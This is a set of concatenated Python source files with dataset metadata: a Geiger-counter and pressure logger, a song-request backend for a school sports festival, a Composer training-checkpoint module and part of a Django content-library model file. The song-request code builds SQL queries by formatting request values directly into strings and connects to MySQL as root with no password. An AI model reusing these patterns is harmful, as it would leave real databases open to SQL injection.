queue.get()\n\n\t\tsuccess = False\n\t\twhile not success:\n\t\t\ttry:\n\t\t\t\tgeigerData = [(k, v) for k, v in urllib.parse.parse_qsl(body) if k == \"cpm\" or k == \"device_time\"]\n\t\t\t\tgeigerBody = json.dumps(dict(geigerData))\n\t\t\t\tlogstashServer = http.client.HTTPConnection(logstash_url, timeout=10)\n\t\t\t\tlogstashServer.request(method=\"POST\", url=\"/geiger\", body=geigerBody, 
headers=logstash_headers)\n\t\t\t\tresponse = logstashServer.getresponse()\n\t\t\t\tresponse.read()\n\n\t\t\t\tif response.status == 200:\n\t\t\t\t\tsuccess = True\n\t\t\t\t\tprint(\"Logged to logstash server: \" + geigerBody)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Logstash server returned status \" + str(response.status) + \": \" + response.reason)\n\n\t\t\t\tpressureData = [(k, v) for k, v in urllib.parse.parse_qsl(body) if k == \"pressure\" or k == \"sea_level_pressure\" or k == \"device_time\"]\n\t\t\t\tpressureBody = json.dumps(dict(pressureData))\n\t\t\t\tlogstashServer = http.client.HTTPConnection(logstash_url, timeout=10)\n\t\t\t\tlogstashServer.request(method=\"POST\", url=\"/pressure\", body=pressureBody, headers=logstash_headers)\n\t\t\t\tresponse = logstashServer.getresponse()\n\t\t\t\tresponse.read()\n\n\t\t\t\tif response.status == 200:\n\t\t\t\t\tprint(\"Logged to logstash server: \" + geigerBody)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Logstash server returned status \" + str(response.status) + \": \" + response.reason)\n\n\t\t\texcept (http.client.HTTPException, socket.error) as err:\n\t\t\t\tprint(\"HTTP error: {0}\".format(err))\n\n\t\t\tif not success:\n\t\t\t\ttime.sleep(5)\n\t\t\t\tprint(\"Retrying...\")\n\ndef oncePerMinute():\n\tglobal next_interval_time\n\twhile True:\n\t\ttry:\n\t\t\t# Sleep for the remainder of the time until the next\n\t\t\t# interval, prevents timer drift. The calculated time\n\t\t\t# to sleep could be negative if our clock got updated\n\t\t\t# by ntptime so just sleep one minute in that case.\n\t\t\tnext_interval_time += 60\n\t\t\tsleep_time = next_interval_time - time.time()\n\t\t\tif sleep_time < 0:\n\t\t\t\tsleep_time = 60\n\t\t\ttime.sleep(sleep_time)\n\n\t\t\tdevice_time = str(datetime.datetime.now())\n\t\t\tcurrent_cpm = cpm\n\n\t\t\tpressure = getPressure()\n\t\t\tsea_level_pressure = pressure / pow(1.0 - altitude_in_meters / 44330.0, 5.255)\n\n\t\t\tbody = urllib.parse.urlencode({'cpm': current_cpm, 'device_time': device_time, 'pressure': '{0:0.2f}'.format(pressure), 'sea_level_pressure': '{0:0.2f}'.format(sea_level_pressure)})\n\t\t\tqueue.put_nowait(body)\n\t\texcept:\n\t\t\tprint(\"Unexpected onePerMinute error: {0}\".format(sys.exc_info()[0]))\n\t\telse:\n\t\t\tprint(\"Queued sample\")\n\ndef samplePressure():\n\tglobal pressure_samples\n\twhile True:\n\t\twith pressure_sampling_lock:\n\t\t\tpressure_samples.append(pressure_sensor.read_pressure())\n\ndef getPressure():\n\tglobal pressure_samples\n\twith pressure_sampling_lock:\n\t\tmedian_pressure = median(pressure_samples)\n\t\tpressure_samples = []\n\treturn median_pressure\n\ndef median(number_list):\n\tsorted_list = sorted(number_list)\n\tlength = len(sorted_list)\n\tif not length % 2:\n\t\treturn (sorted_list[length // 2] + sorted_list[length // 2 - 1]) / 2.0\n\telse:\n\t\treturn sorted_list[length // 2]\n\nsocket.setdefaulttimeout(10)\n\nsendThread = threading.Thread(target = sendData)\nsendThread.daemon = True\nsendThread.start()\n\nnext_interval_time = time.time()\n\nsampleThread = threading.Thread(target = oncePerMinute)\nsampleThread.daemon = True\nsampleThread.start()\n\npressureThread = threading.Thread(target = samplePressure)\npressureThread.daemon = True\npressureThread.start()\n\nwhile True:\n\tbytes = ser.read(36)\n\n\tif len(bytes) == 36:\n\t\ttry:\n\t\t\tline1 = bytes[2:18].decode('ascii')\n\t\t\tline2 = bytes[20:36].decode('ascii')\n\t\t\t#print(line1 + \" \" + line2)\n\n\t\t\tcpm = int(re.search(r'CPM:\\s*(\\d+)', line1).group(1))\n\t\texcept 
(UnicodeDecodeError):\n\t\t\tprint(\"Unicode decoding error!\")\n", "sub_path": "geiger-counter/remote-logging.py", "file_name": "remote-logging.py", "file_ext": "py", "file_size_in_byte": 5813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 47, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 48, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 48, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 57, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 58, "usage_type": "call"}, {"api_name": "gimpbbio.gpio.uarts", "line_number": 60, "usage_type": "attribute"}, {"api_name": "gimpbbio.gpio", "line_number": 60, "usage_type": "name"}, {"api_name": "serial.Serial", "line_number": 66, "usage_type": "call"}, {"api_name": "Adafruit_BMP.BMP085.BMP085", "line_number": 68, "usage_type": "call"}, {"api_name": "Adafruit_BMP.BMP085", "line_number": 68, "usage_type": "name"}, {"api_name": "Adafruit_BMP.BMP085.BMP085_ULTRAHIGHRES", "line_number": 68, "usage_type": "attribute"}, {"api_name": "queue.get", "line_number": 83, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 88, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 88, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "http.client.client.HTTPConnection", "line_number": 90, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 90, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 90, "usage_type": "name"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 101, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "http.client.client.HTTPConnection", "line_number": 103, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 103, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 103, "usage_type": "name"}, {"api_name": "http.client.client", "line_number": 113, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 113, "usage_type": "name"}, {"api_name": "socket.error", "line_number": 113, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}, {"api_name": "time.time", "line_number": 129, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlencode", "line_number": 140, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 140, "usage_type": "attribute"}, {"api_name": "queue.put_nowait", 
"line_number": 141, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 143, "usage_type": "call"}, {"api_name": "socket.setdefaulttimeout", "line_number": 168, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 170, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 176, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 180, "usage_type": "call"}, {"api_name": "re.search", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "473273561", "text": "#coding=utf-8\n# 体育节2020点歌系统Python后端\n\nimport json\nimport time\nimport requests\nimport random\nimport pymysql as mdb\n\ncold_time=15*60\npool_time=2*60*60\n\n#数据库操作,传入操作字符串,返回套着字典的列表\ndef query_sql(sql):\n con=mdb.connect('localhost','root','','ours',charset='utf8')\n cur=con.cursor()\n cur.execute(sql)\n con.commit()\n con.close()\n des=cur.description\n l=[]\n for row in cur.fetchall():\n dis={}\n for i in range(len(cur.description)):\n dis[cur.description[i][0]]=row[i]\n l.append(dis)\n return l\n\n#发送qq信息\ndef send_qq(qq,msg):\n data={'user_id':qq,'message':msg+\"\\n\\n〔学联宣传网络部〕\"}\n requests.post(\"http://127.0.0.1:5700/send_msg/\",data=data)\n with open(\"send_qq.log\",\"a\") as f: f.write(json.dumps(data,ensure_ascii=False)+\"\\n\\n\")\n\n#检查点歌冷却时间\ndef check_cold_time(qq):\n r=query_sql(\"select max(submit_time) as time from music where qq='{}'\".format(qq))\n if r[0]['time'] and r[0]['time']>time.time()-cold_time: return False\n return True\n\n#提交点歌\ndef submit(dic):\n data=dic['data']\n if check_cold_time(dic['qq']):\n sql=\"INSERT INTO music(mid,qq,data,status,submit_time)VALUES( \\\n '{}','{}','{}',1,{})\".format(data['mid'],dic['qq'], \\\n mdb.escape_string(json.dumps(data,ensure_ascii=False)),int(time.time()))\n r=query_sql(sql)\n send_qq(dic['qq'],\"小苏收到(・∀・)\\n歌曲审核成功后将会通知您,欢迎访问 suours.com 探索更多~\")\n else: send_qq(dic['qq'],\"( ´_ゝ`)\\n15分钟内只能点一首歌呢....\")\n\n#查询点歌\ndef query(dic):\n try:\n if dic['type']=='split':\n sql=\"select * from music order by id desc limit {} offset {}\".format(dic['limit'],dic['offset'])\n r=query_sql(sql)\n return {'status':'ok','data':r,'len':len(r)}\n \n if dic['type']=='merge_time':\n sql=\"select * from music where status=4 order by play_time desc limit {} offset {}\".format(dic['limit'],dic['offset'])\n r=query_sql(sql)\n return {'status':'ok','data':r,'len':len(r)}\n \n if dic['type']=='merge_num':\n sql=\"select mid,count(*) as ct,max(data) as data from music group by mid order by ct desc,max(id) desc limit {} offset {}\".format(dic['limit'],dic['offset'])\n r=query_sql(sql)\n return {'status':'ok','data':r,'len':len(r)}\n\n if dic['type']=='statis':\n sql=\"select count(status=1 or null) as waiting,count(judge_time>={} and status=2 or null) as pool,count(*) as total from music;\".format(int(time.time()-pool_time))\n r=query_sql(sql)\n return {'status':'ok','data':r[0]}\n \n return {'status':'error'}\n except:\n return {'status':'error'}\n\n\n#审核点歌\ndef judge(dic):\n try:\n sql=\"update music set status={},judge_time={} where id={}\".format(dic['status'],int(time.time()),dic['id'])\n r=query_sql(sql)\n \n if dic['status']==2: send_qq(dic['qq'],\"您的歌曲[{}]审核通过啦~\\n_(:з」∠)_将在接下来两个小时内随机播放。访问 suours.com/music 查看点歌榜单及播放列表,祝您体育节玩得开心!\".format(dic['name']))\n if dic['status']==3: send_qq(dic['qq'],\"emm您的歌曲[{}]审核未通过呢....\\n(´;ω;`)换一首试试嘛~访问 suours.com/music 查看点歌榜单及播放列表,祝您体育节玩得开心!\".format(dic['name']))\n\n return {'status':'ok','data':r,'len':len(r)}\n 
except:\n return {'status':'error'}\n\n#Get the next song to play\ndef play(dic):\n #try:\n if True:\n sql=\"select * from music where status=5 order by judge_time desc\"\n r=query_sql(sql)\n if len(r): m=r[0]\n else:\n sql=\"select * from music where status=2 and judge_time>={}\".format(int(time.time()-pool_time))\n r=query_sql(sql)\n if len(r)==0: return {'status':'empty'}\n m=r[random.randint(0,len(r)-1)]\n\n sql=\"update music set status=4,play_time={} where id={}\".format(int(time.time()),m['id'])\n query_sql(sql)\n return {'status':'ok','data':m}\n #except:\n # return {'status':'error'}\n \n\n\ndef main(cmd,data):\n if cmd=='submit': submit(data)\n if cmd=='judge': return judge(data)\n if cmd=='query': return query(data)\n if cmd=='play': return play(data)\n\n return {\"status\":\"ok\"}\n\n#submit({'qq':'1525876733','data':{'mid':'S0','name':'2333'}})\n", "sub_path": "api/music.py", "file_name": "music.py", "file_ext": "py", "file_size_in_byte": 4551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymysql.connect", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "pymysql.escape_string", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 71, "usage_type": "call"}, {"api_name": "time.time", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 104, "usage_type": "call"}, {"api_name": "time.time", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "592571128", "text": "# Copyright 2021 MosaicML. 
All Rights Reserved.\n\nimport logging\nimport os\nimport random\nimport warnings\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\nimport torch\nimport yaml\n\nfrom composer.core import Event, State\nfrom composer.core.types import StateDict\nfrom composer.trainer.ddp import DDP\nfrom composer.trainer.devices.device import Device\nfrom composer.utils import seed_all\n\nlog = logging.getLogger(__name__)\n\n\nclass CheckpointLoader:\n \"\"\"Manager for initializing state and restoring RNG state from existing checkpoints.\n\n Args:\n checkpoint_filepath (str): The path to an existing checkpoint file.\n \"\"\"\n\n def __init__(self, checkpoint_filepath: str):\n self.state_dict = torch.load(checkpoint_filepath, map_location='cpu')\n\n def load_checkpoint(self, state: State):\n \"\"\"Initialize state from the loaded checkpoint's data.\n \"\"\"\n\n state.load_state_dict(self.state_dict[\"state\"])\n self.checkpoint_rng_state = self._get_checkpoint_rng_state(state, self.state_dict[\"rng\"])\n\n if state.seed is not None:\n seed_all(state.seed)\n\n def restore_checkpoint_rng_state(self, state: State, device: Device):\n \"\"\"Restore the state of all RNG objects in this context from the loaded checkpoint's data.\n \"\"\"\n\n if self.checkpoint_rng_state is None:\n return\n\n assert state.world_size == len(\n self.checkpoint_rng_state['torch']\n ), f\"invariant violation: if the rng state is being restored, then\" \\\n \"the world size should be the same as in the checkpoint.\"\n\n torch.set_rng_state(self.checkpoint_rng_state['torch'][state.global_rank])\n device.load_state_dict(self.checkpoint_rng_state['device'][state.global_rank])\n random.setstate(self.checkpoint_rng_state['python'][state.global_rank])\n np.random.set_state(self.checkpoint_rng_state['numpy'][state.global_rank])\n\n self.checkpoint_rng_state = None\n\n def _get_checkpoint_rng_state(self, state: State, checkpoint_rng_state: StateDict) -> Optional[StateDict]:\n original_world_size = len(checkpoint_rng_state[\"torch\"])\n if original_world_size == state.world_size:\n return checkpoint_rng_state\n else:\n warnings.warn(f\"The checkpoint was created with world_size({original_world_size}), \"\n f\"which differs from the current world_size({state.world_size}).\"\n f\"RNG state will not be restored.\")\n\n\nclass Checkpointer:\n \"\"\"Manager for saving state to checkpoint files.\n\n Args:\n checkpoint_folder (str): The path to the folder to store checkpoints in.\n checkpoint_interval (int): The amount of time units to wait between checkpoints.\n checkpoint_interval_unit (str): The unit (`\"ep\"` or `\"it\"`) that\n `checkpoint_interval` should be measured in.\n \"\"\"\n\n def __init__(self, checkpoint_folder: str, checkpoint_interval: int, checkpoint_interval_unit: str):\n if checkpoint_interval_unit.lower() == \"ep\":\n self.save_event = Event.EPOCH_END\n elif checkpoint_interval_unit.lower() == \"it\":\n self.save_event = Event.BATCH_END\n else:\n raise ValueError(f\"Unknown checkpointing interval: {checkpoint_interval_unit}\")\n self.checkpoint_folder = checkpoint_folder\n self.save_interval = checkpoint_interval\n\n def should_checkpoint(self, state: State, event: Event) -> bool:\n \"\"\"Given the current state and event, determine whether a checkpoint needs to be created.\n\n Args:\n state (State): The current State of the trainer.\n event (Event): The current Event being executed.\n \"\"\"\n\n if event != self.save_event:\n return False\n if self.save_event == Event.EPOCH_END:\n return state.epoch % 
self.save_interval == 0\n if self.save_event == Event.BATCH_END:\n return state.step % self.save_interval == 0\n return False\n\n def save_checkpoint(self, state: State, device: Device, ddp: DDP, config: Optional[Dict[str, Any]] = None) -> None:\n \"\"\"Save the current state to a new checkpoint file.\n\n Args:\n state (State): The current State of the trainer.\n device (Device): The Device in use by this process.\n ddp (DDP): The DDP engine in use by this trainer.\n config (Optional[Dict[str, Any]]): The hparams used to initialize this trainer, if any.\n \"\"\"\n\n state_dict = {\n 'state': state.state_dict(), # should be the same across all ranks. per-rank state not stored\n 'rng': self._get_rng_state(device=device, ddp=ddp), # stored across all ranks\n }\n if not state.is_rank_zero:\n # only rank 0 saves checkpoints\n # Need the check down here so all the DDP syncs will work for generating the checkpoint\n return\n\n # The trainer will only have _hparams_yaml set if it is instantiated with create_from_hparams\n if config:\n hparams_path = os.path.join(self.checkpoint_folder, \"hparams.yaml\")\n os.makedirs(self.checkpoint_folder, mode=0o775, exist_ok=True)\n config_yaml_str = yaml.dump(config)\n try:\n with open(hparams_path, \"x\") as f:\n # Storing the hparams in a separate file so they can be modified before resuming\n f.write(config_yaml_str)\n except FileExistsError as e:\n with open(hparams_path, \"r\") as f:\n # comparing the parsed hparams to ignore whitespace and formatting differences\n if yaml.safe_load(config_yaml_str) != yaml.safe_load(f):\n raise RuntimeError(f\"The hparams in the existing checkpoint folder {self.checkpoint_folder} \"\n \"differ from those being used in the current training run. \"\n \"Please specify a new checkpoint folder.\") from e\n if self.save_event == Event.EPOCH_END:\n filename = f\"ep{state.epoch}.pt\"\n elif self.save_event == Event.BATCH_END:\n filename = f\"it{state.step}.pt\"\n else:\n raise ValueError(f\"Invalid checkpoint event: {self.save_event}\")\n save_file = os.path.join(self.checkpoint_folder, filename)\n with open(save_file, 'xb') as f:\n torch.save(state_dict, f)\n log.info(f'Trainer checkpoint saved to {save_file}')\n\n def _get_rng_state(self, device: Device, ddp: DDP) -> StateDict:\n rng_state = {\n \"python\": ddp.all_gather_object(random.getstate()),\n \"numpy\": ddp.all_gather_object(np.random.get_state()),\n \"torch\": ddp.all_gather_object(torch.random.get_rng_state()),\n \"device\": ddp.all_gather_object(device.state_dict()),\n }\n # casting the state dict as on non-rank-0, entries will be None-like\n return rng_state\n", "sub_path": "composer/trainer/checkpoint.py", "file_name": "checkpoint.py", "file_ext": "py", "file_size_in_byte": 7032, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 30, "usage_type": "call"}, {"api_name": "composer.core.State", "line_number": 32, "usage_type": "name"}, {"api_name": "composer.utils.seed_all", "line_number": 40, "usage_type": "call"}, {"api_name": "composer.core.State", "line_number": 42, "usage_type": "name"}, {"api_name": "composer.trainer.devices.device.Device", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.set_rng_state", "line_number": 54, "usage_type": "call"}, {"api_name": "random.setstate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random.set_state", "line_number": 
57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "composer.core.State", "line_number": 61, "usage_type": "name"}, {"api_name": "composer.core.types.StateDict", "line_number": 61, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 66, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 61, "usage_type": "name"}, {"api_name": "composer.core.Event.EPOCH_END", "line_number": 83, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 83, "usage_type": "name"}, {"api_name": "composer.core.Event.BATCH_END", "line_number": 85, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 85, "usage_type": "name"}, {"api_name": "composer.core.State", "line_number": 91, "usage_type": "name"}, {"api_name": "composer.core.Event", "line_number": 91, "usage_type": "name"}, {"api_name": "composer.core.Event.EPOCH_END", "line_number": 101, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 101, "usage_type": "name"}, {"api_name": "composer.core.Event.BATCH_END", "line_number": 103, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 103, "usage_type": "name"}, {"api_name": "composer.core.State", "line_number": 107, "usage_type": "name"}, {"api_name": "composer.trainer.devices.device.Device", "line_number": 107, "usage_type": "name"}, {"api_name": "composer.trainer.ddp.DDP", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 129, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 130, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 138, "usage_type": "call"}, {"api_name": "composer.core.Event.EPOCH_END", "line_number": 142, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 142, "usage_type": "name"}, {"api_name": "composer.core.Event.BATCH_END", "line_number": 144, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 144, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 150, "usage_type": "call"}, {"api_name": "composer.trainer.devices.device.Device", "line_number": 153, "usage_type": "name"}, {"api_name": "composer.trainer.ddp.DDP", "line_number": 153, "usage_type": "name"}, {"api_name": "random.getstate", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.random.get_state", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.random.get_rng_state", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.random", "line_number": 157, "usage_type": "attribute"}, {"api_name": "composer.core.types.StateDict", "line_number": 153, "usage_type": "name"}]} +{"seq_id": "596668035", "text": "import os\nimport hashlib\nimport magic\nimport Image\nimport json\nfrom django.db import models, transaction\nfrom django.db.models import Max\nfrom django.utils import timezone\nfrom mptt.models 
import MPTTModel, TreeManager, TreeForeignKey\nfrom django.core.files import File as DjangoFile\nfrom django.contrib.auth.models import User\n\nfrom ..mimemap.models import MimeType\n\nEDIT_SOURCE_CHOICES = (\n ('edit', 'direct edit'),\n ('upload', 'single file upload'),\n ('zip_upload', 'zipped file set upload'),\n ('sync', 'synchronize with external source'),\n)\n\n\nclass DraftManager(models.Manager):\n def create_draft(self, name, user):\n if not name:\n raise ValueError('The draft\\'s name must be set.')\n if user is None:\n raise ValueError('A user must be supplied to create the draft.')\n draft = self.create(name=name, user=user)\n #create citem paths\n draftpath = CItemPath.objects.create(name='Drafts', draft=draft)\n editionpath = CItemPath.objects.create(name='Editions', draft=draft)\n return draft\n\n\nclass Draft(models.Model):\n user = models.ForeignKey(User, related_name=\"baseclib_draft\")\n name = models.CharField(max_length=1024, unique=True)\n create_time = models.DateTimeField(default=timezone.now)\n editions = models.ManyToManyField(\"Edition\", null=True, blank=True)\n active = models.BooleanField(default=True)\n is_private = models.BooleanField(default=False)\n whitelisted_users = models.ManyToManyField(User)\n\n objects = DraftManager()\n\n def __unicode__(self):\n return self.name\n\n def save(self, *args,**kwargs):\n if self.name is None or self.name == \"\":\n self.name = str(self.user) + \"-%s\" % (timezone.now().strftime(\"%Y-%m-%d_%H:%M:%S\"))\n try:\n if self.id is not None:\n my_path = self.get_citem_path()\n if my_path.name != self.name:\n my_path.name = self.name\n my_path.save()\n except CItemPath.DoesNotExist:\n pass\n super(Draft, self).save(*args,**kwargs)\n\n def copy_files(self, source_ci=None, path=None):\n '''Copy a source ContentItem to myself at a specific path'''\n new_path = CItemPath.objects.create(name=path, draft=self, parent=self.get_citem_path())\n new_content = CItem.objects.create(contentfile=source_ci.contentfile,\n name=source_ci.name,\n description=source_ci.description,\n mime_type=source_ci.mime_type,\n detected_meta_data=source_ci.detected_meta_data,\n dimensions=source_ci.dimensions,\n installed_path=new_path,\n rel_pathname_string=source_ci.rel_pathname_string,\n version=source_ci.version,\n edit=source_ci.edit,\n imported=source_ci.imported)\n try:\n self.draftitems_set.get().citems.add(new_content)\n except DraftItems.DoesNotExist:\n self.draftitems_set.add(DraftItems(draft=self))\n self.draftitems_set.get().citems.add(new_content)\n\n def get_item_count(self):\n # there can be only one\n q = self.draftitems_set.all()\n if q.count() == 0:\n return 0\n return q[0].citems.all().count()\n\n def get_citem_path(self):\n try:\n path_drafts = CItemPath.objects.get(name=\"Drafts\", parent__isnull=True)\n except CItemPath.DoesNotExist:\n path_drafts = CItemPath.objects.create(name=\"Drafts\", parent=None, draft=self)\n try:\n my_path = CItemPath.objects.get(parent=path_drafts, draft=self, name=self.name)\n except CItemPath.DoesNotExist:\n my_path = CItemPath.objects.create(name=self.name, parent=path_drafts, draft=self)\n\n return my_path\n\n def get_pending_imports(self):\n ids = list()\n for edit in self.edit_set.all():\n ids.extend(edit.importitem_set.filter(installed_item__isnull=True).values_list('id', flat=True))\n return ImportItem.objects.filter(id__in=ids)\n\n def get_path_wrapped_items(self):\n my_path = self.get_citem_path()\n path_drafts = my_path.parent\n all_paths = 
CItemPath.objects.filter(draft=self).exclude(parent=path_drafts)\n leaves = []\n for p in all_paths:\n for leaf in p.citems.all():\n # skip the /Drafts/draftname part\n this_path = '/' + '/'.join(p.to_path().split(\"/\")[3:])\n this_path += \"/\" + leaf.name\n leaf_wrapper = dict(item=leaf,\n this_path=this_path)\n leaves.append(leaf_wrapper)\n return leaves\n\n\n @transaction.commit_on_success\n def make_edition(self, name):\n # make editionitems out of all the items\n edition = Edition.objects.create(name=name,\n source_draft=self)\n\n editionitems = EditionItems.objects.create(edition=edition)\n # no longer allowed to edit this draft, must clone to edit\n self.active = False\n self.save()\n try:\n # there is only one\n ditems = self.draftitems_set.get()\n for item in ditems.citems.all():\n editionitems.citems.add(item)\n except DraftItems.DoesNotExist:\n pass\n # make paths for all the items, both direct and\n # the \"aliases\"\n try:\n all_ed_path = CItemPath.objects.get(name=\"Editions\", parent__isnull=True)\n except CItemPath.DoesNotExist:\n all_ed_path = CItemPath.objects.create(name=\"Editions\", parent=None, draft=self)\n\n ed_path = CItemPath.objects.create(name=name, parent=all_ed_path, draft=self)\n my_path = self.get_citem_path()\n for kid in my_path.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=ed_path, draft=self)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.edition_make_helper(kid, kid_path)\n\n return edition\n\n def edition_make_helper(self, old_parent, new_parent):\n for kid in old_parent.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=new_parent, draft=self)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.edition_make_helper(kid, kid_path)\n\n\n @transaction.commit_on_success\n def clone(self, name, user=None):\n # copy this draft's items and paths into a new, editable draft\n if user is None:\n user = self.user\n new_draft = Draft.objects.create(name=name, user=user)\n new_draft.whitelisted_users.add(user)\n for u in self.whitelisted_users.all():\n new_draft.whitelisted_users.add(u)\n new_items = DraftItems.objects.create(draft=new_draft)\n\n # there is only one (but there might be none..)\n if self.draftitems_set.exists():\n ditems = self.draftitems_set.all()[0]\n for item in ditems.citems.all():\n new_items.citems.add(item)\n\n # make paths for all the items, both direct and\n # the \"aliases\"\n my_path = self.get_citem_path()\n path_drafts = my_path.parent\n new_path = CItemPath.objects.create(name=name, parent=path_drafts, draft=new_draft)\n for kid in my_path.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=new_path, draft=new_draft)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.clone_helper(kid, kid_path, new_draft)\n return new_draft\n\n def clone_helper(self, old_parent, new_parent, new_draft):\n for kid in old_parent.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=new_parent, draft=new_draft)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.clone_helper(kid, kid_path, new_draft)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass DraftItems(models.Model):\n draft = models.ForeignKey(Draft, unique=True)\n citems = models.ManyToManyField('CItem', null=True, blank=True)\n\n def __unicode__(self):\n return self.draft.name\n\n class Meta:\n app_label = 'mcms'\n\n\nclass Edit(models.Model):\n user = models.ForeignKey(User, related_name=\"baseclib_edit\")\n create_time = 
models.DateTimeField(default=timezone.now)\n source = models.CharField(max_length=30, choices=EDIT_SOURCE_CHOICES, default=\"edit\")\n draft = models.ForeignKey(Draft)\n active = models.BooleanField(default=True)\n\n def __unicode__(self):\n return \"%s-%d\" % (self.user, self.id)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass CItemManager(models.Manager):\n\n @transaction.commit_on_success\n def install_imported(self, user, imported, update=True):\n \"\"\"\n Creates a :class:`CItem` from an :class:`ImportItem` at the requested\n path in the Content Library's logical filesystem.\n\n This involves the following steps:\n\n 1. Determine the path object where we want the new content item to be\n installed.\n 2. If the path does not exist, create it via\n :func:`CItemPath.objects.create_from_path`.\n 3. Determine if we're replacing an existing content item. If so,\n and update was not passed or passed as ``True``, update it.\n Otherwise, install it.\n\n Args:\n :attr:`user` (:class:`django.contrib.auth.models.User`): User\n installing the content item\n\n :attr:`imported` (:class:`ImportItem`): The uploaded content to\n install or update at its :attr:`requested_path`.\n\n :attr:`update` (``bool``, default: ``True``): Whether to update an\n existing item if one is found at the :class:`ImportItem` instance's\n :attr:`requested_path`. If an existing :class:`CItem` is found at\n the requested path but :attr:`update` is passed as ``False``, an\n ``Exception`` will be raised.\n\n Returns:\n The :class:`CItem` created by this method.\n \"\"\"\n draft = imported.edit.draft\n 